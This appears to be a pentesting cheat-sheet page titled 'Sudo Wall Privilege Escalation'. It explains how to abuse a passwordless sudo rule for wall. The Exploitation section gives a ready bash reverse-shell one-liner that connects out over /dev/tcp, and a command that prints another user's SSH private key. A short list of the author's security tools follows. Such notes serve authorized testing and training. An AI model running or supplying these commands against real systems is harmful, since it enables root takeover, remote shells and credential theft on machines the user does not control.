Exploit Notes

Sudo Wall Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

Wall command can display the result of OS command. Executing as root might be vulnerable to privilege escalation (PrivEsc).

Investigation

sudo -l

(ALL) NOPASSWD: wall

Exploitation

# Reverse shell
sudo wall "$(bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1')"

# Gets a SSH private key of another user
sudo wall "$(cat /home/user/.ssh/id_rsa)"

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.